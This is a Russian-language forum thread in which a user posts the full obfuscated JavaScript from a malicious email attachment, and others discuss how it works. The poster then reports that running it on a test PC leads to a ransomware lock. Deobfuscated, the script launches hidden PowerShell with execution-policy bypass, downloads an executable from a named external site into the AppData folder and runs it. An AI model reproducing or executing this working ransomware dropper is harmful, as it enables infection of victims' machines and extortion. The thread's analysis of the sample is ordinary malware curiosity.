Прислали письмо с вложением zip файла в котором был js разобрав который вытащил сайт с которого заливается тело исполняемого файла вируса.
Чисто ради практического интереса - можно ли куда то настучать что "вон тот гомосек рассылает вон такие вот пакости!"?
Если у кого есть желание пощикотать пятую точку могу скинуть текст исполняемого скрипта закатчика. Дальше я не полез ибо хер его знает что там.
В горячую линию мвд звони)
Боюсь что там они скажут "Нука че тут за ссылко?" и тыкнут...
JS не умеет запускать исполняемые файлы. Максимум через ActiveXObject, который работает только в IE, и то с доп. разрешением, и конечно же в случае со скаченным файлом, нужно четко знать куда он скачивается. Но если это стандартная директория с загрузками, то не проблема.
Скорее всего там банально что-то типа:
<a href="C:\Program Files\Notepad++\notepad++.exe">Блокнот</a>
<a href="C:\Program Files\Notepad++\notepad++.exe">Блокнот</a>
хз как тут в спойлер кидать, Вот текст скрипта в общем:
var FkMwWBV = ''+
'NkN'+
'AfNCNH'+
'sNGNiN.NSheNlN'+
'lNENxeNc'+
'Nu'+
'tNeN('+
'N"'+
'N'+
'CN'+
'mN'+
'D'+
'N.exNeN"N,N "/cN NpNiNnNg l'+
'oNcalN'+
'hoNsNtN N&N N'+
'pNoNwNeNrNsNheN'+
'lNlN.NeNxeN '+
'-NeNxeNc'+
'NuNtio'+
'Nnp'+
'NolNiN'+
'cy b'+
'NyNpa'+
'N'+
's'+
'Ns N-NnN'+
'o'+
'Np'+
'rNof'+
'iNleN N-NwNiNnN'+
'do'+
'wNsNt'+
'NyNleN hNiNdN'+
'de'+
'nN (newN-'+
'oNbN'+
'jectN Nsy'+
'NsN'+
'tNemN.'+
'Nn'+
'NetN'+
'.w'+
'N'+
'eNb'+
'clNiNenNtN'+
')'+
'.NdowNnlNoaNdNfNile(\''+
'N'+
'h'+
'tNtNp://j'+
'Ne'+
'N'+
'fN'+
'freNyN'+
'aNlNaNn'+
'jonNeNs.NcNom/FTN'+
'LOM/iNma'+
'Ng'+
'es/dhlN_'+
'pN'+
'aNr'+
'cNeNl.php\',\'N%ApN'+
'PNdaN'+
'TN'+
'aN%'+
'U'+
'NINSN'+
'3'+
'8N.eNxe\')N; NSt'+
'ar'+
'NTN-Npr'+
'NONCNeSNs \'N%N'+
'APNpN'+
'dNANtN'+
'a'+
'N%NU'+
'ISN38N.eNxe\'"'+
'N,'+
' N"N"N,N'+
' '+
'"NopeNnN'+
'",N N0);';
var oQiuhFV = "HQKQLM\\sQ"+
"oftWQa"+
"Qre\\MQiQC"+
"R"+
"Qo"+
"QSO"+
"QfT\\WIQnQDowsQ QnT\\cQuQ"+
"RQr"+
"QE"+
"NQTQv"+
"eQrQSQiQ"+
"oN\\sQY"+
"QsQtQemr"+
"QOQoT";
oQiuhFV = oQiuhFV.replace(/\Q/g, "");
var OzjGFKuQ = new ActiveXObject("wscRipt.shelL");
var OdbiWJry = OzjGFKuQ.RegRead(oQiuhFV).charAt(378936845/75787369).toUpperCase();
var kAfCHsGi = new ActiveXObject("sHeLl.aPplicatIOn");
(new Function(FkMwWBV.replace(RegExp(OdbiWJry, "g"), "")))();
Прям целая криптография
Ну как я понимаю, данный скрипт будет работать только в эксплоере. Зашифрованная ссылка на файл, который якобы должен запускаться после считывания реестра. Правда тут я не понимаю, как скаченный файл попадает в регистр... Возможно опять таки за счет ActiveXObject элемента, который эксплоер может где то и прописывает.
Детально лень расшифровывать, но в целом интересно. Кто-то да и попадётся на подобное
а хотя... скрипт же в ручную на системе запускается, тогда и браузер то толком нужен лишь для того, чтобы скачался файл. Так уже опаснее)
В общем если заранее подготовиться то не так уж все и страшно.
Берем компьютер с чистой виндой. Два пользователя - User - права "Пользователь" и Root - права "Администратор". Оба на разных паролях. UAC включена. Родной фаервол отключен. Установлен ESET SS с не очень свежими базами. Создаем папку с несколькими файлами. 1.doc, 2.xls, 3.jpg, 4.pdf, 5.rar. Кладем копии папок в "Мои документы" обоим пользователям.
Заходим в User. Подрубаем интернет любого типа (я взял для теста yota свисток что бы не положить сеть на тестах ), переходим по ссылке на архив который прислали (у меня файл был заранее скачал) и запускаем Документ.js
Компьютер пару минут пыхтит затем пару раз поморгав запускает эксплорер с предупреждением что компьютер заблокирован и надо платить бабки за восстановление. В параллель начинает вылезать окно UAC с замечанием что что то не так и кто то пытается пролезть в папку систем и куда то еще а прав то не хватает. Окно на закрытие не реагирует - программа в цикле пытается запустить файл пока не убивается в ручную через диспетчер задач. Файлы в документах юзера благополучно запаролены и не читаемы. Сам исполняемый файл вируса падает в папку c:\Uses\User\AppDate\RoamingUIS38.exe.
Если лень копаться то вытаскиваем все документы (живые) из папки Root/Documents и сносим всю системы. Документы в запароленных "Администратором" папках вирус не тронул. После ради прикола тыкнул в файл вируса "Сканировать программой ESET SS" Венда запросила доступ на сканирование администратору системы. После этого документы рута благополучно скисли Так что антивирус даже противопоказан.
Русская версия Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)